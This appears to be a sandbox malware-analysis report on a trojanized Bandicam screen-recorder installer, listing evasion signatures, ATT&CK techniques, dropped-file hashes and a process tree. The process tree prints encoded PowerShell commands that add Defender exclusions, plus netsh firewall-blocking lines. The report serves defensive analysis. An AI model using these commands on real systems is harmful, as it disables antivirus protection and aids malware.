745085510ff4431bb1427bdce3f1eb8396d42175fb66fb28220851a8aadddf54

Analysis

max time kernel
77s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
22-03-2023 19:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BandicamScreenRecorder.exe
Size

52.6MB
MD5

d740f2075e4e5138d81379da576f1ec9
SHA1

3c916466753ef155c7cd64ae90ed987cb04f7385
SHA256

745085510ff4431bb1427bdce3f1eb8396d42175fb66fb28220851a8aadddf54
SHA512

b911c2f7c935518e5befc8d53eab0ff6bd52379a51500f7213a3eeee7a20d9443913dc9c538839a92918d412acbf97d1f9f85abe990908e1fa338cb9f6c77b24
SSDEEP

1572864:Xxte3/h4OwmO9z/NfdTCCsl0KvqqoVWiI17zdNAx:XxM3Gn/N5tsFvqxVO17zdNAx

Score

9^/10

discovery evasion themida trojan

Malware Config

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

VCR-2005-2023-09.02.2023.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VCR-2005-2023-09.02.2023.exe
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

3112 netsh.exe
1956 netsh.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VCR-2005-2023-09.02.2023.exe

pid	process
3112	netsh.exe
1956	netsh.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VCR-2005-2023-09.02.2023.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VCR-2005-2023-09.02.2023.exe

Executes dropped EXE 4 IoCs

Processes:

BandicamScreenRecorder.tmpBandicam.6.0.4.2024.exeBandicam.6.0.4.2024.tmpVCR-2005-2023-09.02.2023.exe

pid process

4588 BandicamScreenRecorder.tmp
5024 Bandicam.6.0.4.2024.exe
1428 Bandicam.6.0.4.2024.tmp
4856 VCR-2005-2023-09.02.2023.exe

Loads dropped DLL 9 IoCs

Processes:

BandicamScreenRecorder.tmpBandicam.6.0.4.2024.tmp

pid	process
4588	BandicamScreenRecorder.tmp
4588	BandicamScreenRecorder.tmp
4588	BandicamScreenRecorder.tmp
4588	BandicamScreenRecorder.tmp
4588	BandicamScreenRecorder.tmp
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp

Themida packer 23 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe	themida
C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe	themida
behavioral2/memory/4856-302-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-313-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-340-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-345-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-346-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-347-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-349-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-354-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-355-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-356-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe	themida
behavioral2/memory/4856-382-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe	themida
behavioral2/memory/2696-420-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/4856-611-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/2696-626-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
behavioral2/memory/2696-645-0x00007FF7EBD70000-0x00007FF7ECAC3000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\_MEI48562\pytransform.pyd	themida
C:\Users\Admin\AppData\Local\Temp\_MEI48562\pytransform.pyd	themida
behavioral2/memory/2696-719-0x000000006DE20000-0x000000006E9FD000-memory.dmp	themida
behavioral2/memory/2696-746-0x000000006DE20000-0x000000006E9FD000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

VCR-2005-2023-09.02.2023.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VCR-2005-2023-09.02.2023.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

VCR-2005-2023-09.02.2023.exe

pid process

4856 VCR-2005-2023-09.02.2023.exe

pid	process
4856	VCR-2005-2023-09.02.2023.exe

Drops file in Program Files directory 15 IoCs

Processes:

BandicamScreenRecorder.tmpBandicam.6.0.4.2024.tmp

description	ioc	process
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	BandicamScreenRecorder.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-T5H2N.tmp	BandicamScreenRecorder.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcamih.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.dat	BandicamScreenRecorder.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcap32.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe	BandicamScreenRecorder.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\is-DSF4P.tmp	BandicamScreenRecorder.tmp
File created	C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\unins000.msg	BandicamScreenRecorder.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcam64.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcam32.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcamvk64.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcam.exe	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcamvk32.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdcap64.dll	Bandicam.6.0.4.2024.tmp
File opened for modification	C:\Program Files (x86)\Bandicam\bdfix.exe	Bandicam.6.0.4.2024.tmp

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

1236 taskkill.exe

pid	process
1236	taskkill.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

BandicamScreenRecorder.tmppowershell.exepowershell.exeBandicam.6.0.4.2024.tmp

pid	process
4588	BandicamScreenRecorder.tmp
4588	BandicamScreenRecorder.tmp
4812	powershell.exe
4812	powershell.exe
3040	powershell.exe
3040	powershell.exe
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp
1428	Bandicam.6.0.4.2024.tmp

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4812 powershell.exe
Token: SeDebugPrivilege 3040 powershell.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

BandicamScreenRecorder.tmp

pid process

4588 BandicamScreenRecorder.tmp

description	pid	process
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe

Suspicious use of WriteProcessMemory 23 IoCs

Processes:

BandicamScreenRecorder.exeBandicamScreenRecorder.tmpcmd.exeBandicam.6.0.4.2024.exeBandicam.6.0.4.2024.tmp

description	pid	process	target process
PID 2276 wrote to memory of 4588	2276	BandicamScreenRecorder.exe	BandicamScreenRecorder.tmp
PID 2276 wrote to memory of 4588	2276	BandicamScreenRecorder.exe	BandicamScreenRecorder.tmp
PID 2276 wrote to memory of 4588	2276	BandicamScreenRecorder.exe	BandicamScreenRecorder.tmp
PID 4588 wrote to memory of 2188	4588	BandicamScreenRecorder.tmp	cmd.exe
PID 4588 wrote to memory of 2188	4588	BandicamScreenRecorder.tmp	cmd.exe
PID 4588 wrote to memory of 2188	4588	BandicamScreenRecorder.tmp	cmd.exe
PID 2188 wrote to memory of 4812	2188	cmd.exe	powershell.exe
PID 2188 wrote to memory of 4812	2188	cmd.exe	powershell.exe
PID 2188 wrote to memory of 4812	2188	cmd.exe	powershell.exe
PID 2188 wrote to memory of 3040	2188	cmd.exe	powershell.exe
PID 2188 wrote to memory of 3040	2188	cmd.exe	powershell.exe
PID 2188 wrote to memory of 3040	2188	cmd.exe	powershell.exe
PID 4588 wrote to memory of 5024	4588	BandicamScreenRecorder.tmp	Bandicam.6.0.4.2024.exe
PID 4588 wrote to memory of 5024	4588	BandicamScreenRecorder.tmp	Bandicam.6.0.4.2024.exe
PID 4588 wrote to memory of 5024	4588	BandicamScreenRecorder.tmp	Bandicam.6.0.4.2024.exe
PID 5024 wrote to memory of 1428	5024	Bandicam.6.0.4.2024.exe	Bandicam.6.0.4.2024.tmp
PID 5024 wrote to memory of 1428	5024	Bandicam.6.0.4.2024.exe	Bandicam.6.0.4.2024.tmp
PID 5024 wrote to memory of 1428	5024	Bandicam.6.0.4.2024.exe	Bandicam.6.0.4.2024.tmp
PID 4588 wrote to memory of 4856	4588	BandicamScreenRecorder.tmp	VCR-2005-2023-09.02.2023.exe
PID 4588 wrote to memory of 4856	4588	BandicamScreenRecorder.tmp	VCR-2005-2023-09.02.2023.exe
PID 1428 wrote to memory of 3112	1428	Bandicam.6.0.4.2024.tmp	netsh.exe
PID 1428 wrote to memory of 3112	1428	Bandicam.6.0.4.2024.tmp	netsh.exe
PID 1428 wrote to memory of 3112	1428	Bandicam.6.0.4.2024.tmp	netsh.exe

C:\Users\Admin\AppData\Local\Temp\BandicamScreenRecorder.exe
"C:\Users\Admin\AppData\Local\Temp\BandicamScreenRecorder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2276

C:\Users\Admin\AppData\Local\Temp\is-A5M52.tmp\BandicamScreenRecorder.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A5M52.tmp\BandicamScreenRecorder.tmp" /SL5="$B004C,54136461,956928,C:\Users\Admin\AppData\Local\Temp\BandicamScreenRecorder.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4588

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\WebrootCommAgentService.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXAAnACkA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACgAWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAVgBhAHIAaQBhAGIAbABlACgAJwBVAFMARQBSAFAAUgBPAEYASQBMAEUAJwApACAAKwAgACcAXABBAHAAcABEAGEAdABhACcAKQA=
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe
"C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe" /install /quiet /norestart
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5024

C:\Users\Admin\AppData\Local\Temp\is-A1I4L.tmp\Bandicam.6.0.4.2024.tmp
"C:\Users\Admin\AppData\Local\Temp\is-A1I4L.tmp\Bandicam.6.0.4.2024.tmp" /SL5="$70054,32863982,93696,C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe" /install /quiet /norestart
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1428

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Bandicam block" dir=in interface=any action=block remoteip="52.79.86.85" enable=yes
5⤵
- Modifies Windows Firewall
PID:3112

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Bandicam block" dir=out interface=any action=block remoteip="52.79.86.85" enable=yes
5⤵
- Modifies Windows Firewall
PID:1956

C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE
"C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE" /S
5⤵
PID:3272

C:\Windows\SysWOW64\regsvr32.exe
"regsvr32" /s "C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll"
6⤵
PID:3644

C:\Windows\system32\regsvr32.exe
/s "C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll"
7⤵
PID:796

C:\Program Files (x86)\Bandicam\bdcam.exe
"C:\Program Files (x86)\Bandicam\bdcam.exe" /install
5⤵
PID:4456

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Program Files (x86)\Bandicam\bdcamvk64.dll",RegDll
6⤵
PID:3608

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Program Files (x86)\Bandicam\bdcamvk32.dll",RegDll
6⤵
PID:3424

C:\Users\Admin\AppData\Local\Temp\is-52QJF.tmp\bdcam.exe
"C:\Users\Admin\AppData\Local\Temp\is-52QJF.tmp\bdcam.exe"
5⤵
PID:3760

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /f /im "bdcam.exe"
5⤵
- Kills process with taskkill
PID:1236

C:\Program Files (x86)\Bandicam\bdcam.exe
"C:\Program Files (x86)\Bandicam\bdcam.exe"
5⤵
PID:1096

C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\\VCR-2005-2023-09.02.2023.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4856

C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\VCR-2005-2023-09.02.2023.exe
"C:\Users\Admin\AppData\Local\Temp\is-GDVVV.tmp\\VCR-2005-2023-09.02.2023.exe"
4⤵
PID:2696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -inputformat none -outputformat none -NonInteractive -ExecutionPolicy Bypass -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMwA1AA==
5⤵
PID:3636

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x398 0x418
1⤵
PID:1892

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\BandiMPEG1\bdfilters.dll
Filesize
4.1MB

MD5
ed730387fdcd684b756601b863c47417

SHA1
c49ed6d0d46facf4ceaeb21f5d6bfdf9e3587fde

SHA256
9cbc29696ad2d582e251bf9c4be5cce618753fa43551d2474e1ae5cc5e1245e5

SHA512
e32df727799d33922c6e92f94a7bdb0bc2772d6a6636d15e285d94d3ae4661062e5bc89ec3546b76ec853398f88d972f461327ef687f89093acf1096560d5c3f

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters.dll
Filesize
4.1MB

MD5
ed730387fdcd684b756601b863c47417

SHA1
c49ed6d0d46facf4ceaeb21f5d6bfdf9e3587fde

SHA256
9cbc29696ad2d582e251bf9c4be5cce618753fa43551d2474e1ae5cc5e1245e5

SHA512
e32df727799d33922c6e92f94a7bdb0bc2772d6a6636d15e285d94d3ae4661062e5bc89ec3546b76ec853398f88d972f461327ef687f89093acf1096560d5c3f

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll
Filesize
4.6MB

MD5
13f7a29baa1e04f74151737cb71bd0e5

SHA1
0bc8682c6c96923a729aa6239aa53d95221b13ab

SHA256
008fababd36e8fbfd5f610a2c62d47963e78ec91e54ad69a1e20807445c3528d

SHA512
4cea11e88e8861c4094b227d85295c0d67452af703b0ec9dfe475797b87d03b40bc1f6b58dcc00996672c1c05d99b82dcc067bc429a1465ae90f4ec966f2bca8

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll
Filesize
4.6MB

MD5
13f7a29baa1e04f74151737cb71bd0e5

SHA1
0bc8682c6c96923a729aa6239aa53d95221b13ab

SHA256
008fababd36e8fbfd5f610a2c62d47963e78ec91e54ad69a1e20807445c3528d

SHA512
4cea11e88e8861c4094b227d85295c0d67452af703b0ec9dfe475797b87d03b40bc1f6b58dcc00996672c1c05d99b82dcc067bc429a1465ae90f4ec966f2bca8

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll
Filesize
4.6MB

MD5
13f7a29baa1e04f74151737cb71bd0e5

SHA1
0bc8682c6c96923a729aa6239aa53d95221b13ab

SHA256
008fababd36e8fbfd5f610a2c62d47963e78ec91e54ad69a1e20807445c3528d

SHA512
4cea11e88e8861c4094b227d85295c0d67452af703b0ec9dfe475797b87d03b40bc1f6b58dcc00996672c1c05d99b82dcc067bc429a1465ae90f4ec966f2bca8

Download Submit
C:\Program Files (x86)\BandiMPEG1\bdfilters64.dll
Filesize
4.6MB

MD5
13f7a29baa1e04f74151737cb71bd0e5

SHA1
0bc8682c6c96923a729aa6239aa53d95221b13ab

SHA256
008fababd36e8fbfd5f610a2c62d47963e78ec91e54ad69a1e20807445c3528d

SHA512
4cea11e88e8861c4094b227d85295c0d67452af703b0ec9dfe475797b87d03b40bc1f6b58dcc00996672c1c05d99b82dcc067bc429a1465ae90f4ec966f2bca8

Download Submit
C:\Program Files (x86)\Bandicam\bdcam.exe
Filesize
12.9MB

MD5
bf5d96e4e4b03bfc40aed61714ce7c03

SHA1
764beb0fb8f98115fdadab76ee3775294a4e0f36

SHA256
61904cefc25d26c7bac6196d4c2cc1d3f6f71a7759a4704eb862f539db25c637

SHA512
c28b82e60c783f983927f2f3708af9e5b5538328557dff6575632a37ea7cb72818c725cb76c664a3e416d72ccd18b38e45800dc4ddc49e77632d2c297ddbef17

Download Submit
C:\Program Files (x86)\Bandicam\bdcam.exe
Filesize
12.9MB

MD5
bf5d96e4e4b03bfc40aed61714ce7c03

SHA1
764beb0fb8f98115fdadab76ee3775294a4e0f36

SHA256
61904cefc25d26c7bac6196d4c2cc1d3f6f71a7759a4704eb862f539db25c637

SHA512
c28b82e60c783f983927f2f3708af9e5b5538328557dff6575632a37ea7cb72818c725cb76c664a3e416d72ccd18b38e45800dc4ddc49e77632d2c297ddbef17

Download Submit
C:\Program Files (x86)\Bandicam\bdcam.exe
Filesize
12.9MB

MD5
bf5d96e4e4b03bfc40aed61714ce7c03

SHA1
764beb0fb8f98115fdadab76ee3775294a4e0f36

SHA256
61904cefc25d26c7bac6196d4c2cc1d3f6f71a7759a4704eb862f539db25c637

SHA512
c28b82e60c783f983927f2f3708af9e5b5538328557dff6575632a37ea7cb72818c725cb76c664a3e416d72ccd18b38e45800dc4ddc49e77632d2c297ddbef17

Download Submit
C:\Program Files (x86)\Bandicam\bdcam.exe
Filesize
12.9MB

MD5
bf5d96e4e4b03bfc40aed61714ce7c03

SHA1
764beb0fb8f98115fdadab76ee3775294a4e0f36

SHA256
61904cefc25d26c7bac6196d4c2cc1d3f6f71a7759a4704eb862f539db25c637

SHA512
c28b82e60c783f983927f2f3708af9e5b5538328557dff6575632a37ea7cb72818c725cb76c664a3e416d72ccd18b38e45800dc4ddc49e77632d2c297ddbef17

Download Submit
C:\Program Files (x86)\Bandicam\bdcamvk32.dll
Filesize
1.5MB

MD5
966813c94d9e93439f073bafcd4c83a2

SHA1
c85290dfc7cb5c3a3855481d67b3c05179aa580c

SHA256
7b885216e9283030a6d44934d0192c70852c3027322079574fd57322b0ba1dd8

SHA512
d2954975cc045700bc0536ca832f0ce5c9529a7379f25ae9bf063ec3143d56b2c2744c28dc71a38f48257a411cd1e3d90b0f4a6270527f1db1c010003115c344

Download Submit
C:\Program Files (x86)\Bandicam\bdcamvk32.dll
Filesize
1.5MB

MD5
966813c94d9e93439f073bafcd4c83a2

SHA1
c85290dfc7cb5c3a3855481d67b3c05179aa580c

SHA256
7b885216e9283030a6d44934d0192c70852c3027322079574fd57322b0ba1dd8

SHA512
d2954975cc045700bc0536ca832f0ce5c9529a7379f25ae9bf063ec3143d56b2c2744c28dc71a38f48257a411cd1e3d90b0f4a6270527f1db1c010003115c344

Download Submit
C:\Program Files (x86)\Bandicam\bdcamvk64.dll
Filesize
1.9MB

MD5
fa0fdf41c41566dd9fa70ff0d4b353da

SHA1
29bf760fde8ecaecd005cac633c3ae1ce60ab3b9

SHA256
4314467e0115bb61cc17165c526a7fcfad2ce711d627331e55d6adf73ed44302

SHA512
2769850684afe5dfc67f4c7f4eb6ed12bc10927bd82201a0ea93ca6f10239968148aad7cccc64557d7e4d9bf5ec48e90b1558506c72cf803aa23e687e4a789a4

Download Submit
C:\Program Files (x86)\Bandicam\bdcamvk64.dll
Filesize
1.9MB

MD5
fa0fdf41c41566dd9fa70ff0d4b353da

SHA1
29bf760fde8ecaecd005cac633c3ae1ce60ab3b9

SHA256
4314467e0115bb61cc17165c526a7fcfad2ce711d627331e55d6adf73ed44302

SHA512
2769850684afe5dfc67f4c7f4eb6ed12bc10927bd82201a0ea93ca6f10239968148aad7cccc64557d7e4d9bf5ec48e90b1558506c72cf803aa23e687e4a789a4

Download Submit
C:\Program Files (x86)\Bandicam\bdcap64.dll
Filesize
20.7MB

MD5
17b68c3d5269e9cce34f04e208a8b592

SHA1
30c28705a3d380fdb2708be3fc8bcac35ec01948

SHA256
9a3a2ae1ca634b92bc6b361ff713fe1dc940571820c2f316a2524f51e81be951

SHA512
bc82da597f3ccc322cd80562f6958c610a57488f7b64bfa49d072c415d39505552a4f237496a3548d9e6f57d67f0ec94a3f5001f3f719c5ea6732b690dd27a4e

Download Submit
C:\Program Files (x86)\Bandicam\data\language.dat
Filesize
86KB

MD5
e342d2cec85249a3a86011554acfd064

SHA1
63c0dfa243d50acf9815158a261a5396ad22b831

SHA256
7da225a3a6b61d82a3c54fac436316041cbe4a5d589f4e79b4f2574f49ceaae3

SHA512
bdce997eb680eac2b13e7f43a6cb1a33fe64156907f0896799c038cd05726d21ef8b6926dff2f46f7b7891ca2e674f3b7f7e09fb54e9a530a64eab848d1d1587

Download Submit
C:\Program Files (x86)\Bandicam\data\skin.dat
Filesize
804KB

MD5
8993fda93916ee8a9aafd3088364d3a9

SHA1
de7a2b1fd14c8add6b800a6ec04739fbfe31d011

SHA256
f330e7316a0cccb456d2c2ba6e5afcbea883ec67a13ff626d3f748b5cac9dafc

SHA512
f8c1a591af37ba549f073ad2c30e647bc718292b6e22a0fdb1c26990284629bc802426c3cdccc86281f9914f7e9406195a01db1b0412f30e1b5bd9eb5aa95210

Download Submit
C:\Program Files (x86)\Bandicam\lang\English.ini
Filesize
126KB

MD5
3861986f215f75c12ac32f42264378e5

SHA1
82c629525404ce7fd5314a6d154a650621b3fdd3

SHA256
c5f10736175648d0f1c61f17b398e468fec9696e075ae5aae8cd752e3faaed60

SHA512
526e50221f62b0fee237b7af142d0736082326f5dc4ec703cedc0817bc47c3e75515ecf6c5a6eb80b315e4dced3a356e3724541cf5a4dc922462d3b269049034

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe
Filesize
31.7MB

MD5
e1378bab2359d0f6f8986da82109b1ab

SHA1
b7507228c637d727e32209f6f4562cddbbba0e23

SHA256
8bbf1e6510d18a1729864f45cb1a7c74655b28deeee79a722814556f23e00084

SHA512
79fa4cdf309f8f114b8b174dd8f2403881a22beeb746a06972b38aca99b152614f59cc8d190402e6108121611b8c7a61838bade180a90425b78ed346fbdc23b0

Download Submit
C:\Program Files (x86)\Microsoft Visual C++ Redistributable latest\Bandicam.6.0.4.2024.exe
Filesize
31.7MB

MD5
e1378bab2359d0f6f8986da82109b1ab

SHA1
b7507228c637d727e32209f6f4562cddbbba0e23

SHA256
8bbf1e6510d18a1729864f45cb1a7c74655b28deeee79a722814556f23e00084

SHA512
79fa4cdf309f8f114b8b174dd8f2403881a22beeb746a06972b38aca99b152614f59cc8d190402e6108121611b8c7a61838bade180a90425b78ed346fbdc23b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
b669a65a7b224f960f91c36b4557eb72

SHA1
bb9cfc601d9ea2cdd37f2797941f9685a548dadf

SHA256
ad88e8c30344aeb5eb8c6a8a163a2689514f2a31797bf10424f8a5714081ae99

SHA512
de58736a672a52223ce2ede25d33587dae79decad50161ebab61a22ba46400aba8fe06d6b46d0d5d14c15d8acb84bc9de9988abf9ea42d9a8578869afa39788d

Download Submit
C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE
Filesize
1.4MB

MD5
461d135a4fccd51bbae38f742e123fd3

SHA1
c12a442fbcd4a9c44102f0a560ba03d59bc501ed

SHA256
4c441e7d744a2a273f780103bcf5bcb1e32c2d9c6a32b62f9044b32107544079

SHA512
41eb816bf0cc0ca12b5c6c07517cd718b8701255ea81e94ffc937f2538b8cdf5db24751cdbc22fefd6496b767fc0d631fea76216b0363f4b625557097b3caaee

Download Submit
C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE
Filesize
1.4MB

MD5
461d135a4fccd51bbae38f742e123fd3

SHA1
c12a442fbcd4a9c44102f0a560ba03d59bc501ed

SHA256
4c441e7d744a2a273f780103bcf5bcb1e32c2d9c6a32b62f9044b32107544079

SHA512
41eb816bf0cc0ca12b5c6c07517cd718b8701255ea81e94ffc937f2538b8cdf5db24751cdbc22fefd6496b767fc0d631fea76216b0363f4b625557097b3caaee

Download Submit
C:\Users\Admin\AppData\Local\Temp\BDMPEG1SETUP.EXE
Filesize
1.4MB

MD5
461d135a4fccd51bbae38f742e123fd3

SHA1
c12a442fbcd4a9c44102f0a560ba03d59bc501ed

SHA256
4c441e7d744a2a273f780103bcf5bcb1e32c2d9c6a32b62f9044b32107544079

SHA512
41eb816bf0cc0ca12b5c6c07517cd718b8701255ea81e94ffc937f2538b8cdf5db24751cdbc22fefd6496b767fc0d631fea76216b0363f4b625557097b3caaee

Download Submit
